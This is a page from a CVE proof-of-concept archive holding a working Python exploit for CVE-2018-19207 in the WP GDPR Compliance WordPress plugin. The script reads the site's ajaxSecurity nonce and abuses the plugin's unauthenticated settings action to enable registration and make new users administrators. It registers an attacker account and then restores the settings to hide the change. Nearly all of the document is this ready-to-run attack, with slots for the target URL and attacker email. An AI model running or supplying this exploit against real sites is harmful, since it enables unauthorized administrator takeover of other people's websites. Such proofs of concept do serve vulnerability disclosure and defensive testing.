4837 Total CVEs
26 Years
GitHub
Home / 2018 / CVE-2018-19207
README.md
Rendering markdown...
POC / wp_gdpr_compliance_exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import re

#######################################
#      CHANGE THESE VARIABLES         #
#######################################
baseurl = "https://example.com"
username = "hacker"
email = "[email protected]" #valid email is needed for account creation


#######################################
#  NO CHANGES NEEDED AFTER THIS PART  #
#######################################

if baseurl[-1] is not "/":
    baseurl += "/"
ajaxurl = baseurl + "wp-admin/admin-ajax.php"
registerurl = baseurl + "wp-login.php?action=register"

print "WP GDPR Compliance Plugin (<=1.4.2) Exploit"
print "             CVE-2018-19207"
print "###########################################\n\r"
print "Trying to exploit instance on {}\n\r\n\r".format(baseurl)

print "Retrieving ajaxSecurity nonce..."

nonce_pattern = re.compile(r'\"ajaxSecurity\":\"(.*?)\"\}')
r = requests.get(baseurl)

match = re.findall(nonce_pattern,r.content)
if match:
    ajaxSecurity = match[0]
    print "ajaxSecurity: {}\n\r".format(ajaxSecurity)
else:
    print "Was not able to find any ajaxSecurity nonce... Are you sure the plugin is installed?"
    exit(0)

print "Enabling user registration..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "users_can_register", "value": "1"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)
print "Setting default role to administrator..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "default_role", "value": "administrator"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)

print "\n\rRegistering user '{}' with email '{}'...\n\r".format(username, email)
params = {'user_login':username, 'user_email':email, 'wp-submit':"Registrieren"}
r = requests.post(registerurl,data=params)
print r.content

print "Disabling user registration..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "users_can_register", "value": "0"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)
print "Setting default role back to subscriber..."
params = {'action':'wpgdprc_process_action', 'data':'{"type": "save_setting", "append": false, "option": "default_role", "value": "subscriber"}', 'security':ajaxSecurity}
r = requests.post(ajaxurl,data=params)

print "\n\r\n\rAccount {} created. Check you mail at {} for setting password.".format(username, email)